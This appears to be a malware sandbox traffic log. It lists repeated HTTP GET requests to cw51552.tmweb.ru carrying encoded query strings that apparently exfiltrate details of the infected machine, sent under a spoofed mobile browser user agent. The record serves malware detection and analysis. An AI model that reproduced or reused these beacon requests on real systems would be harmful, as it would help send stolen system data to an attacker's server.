Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
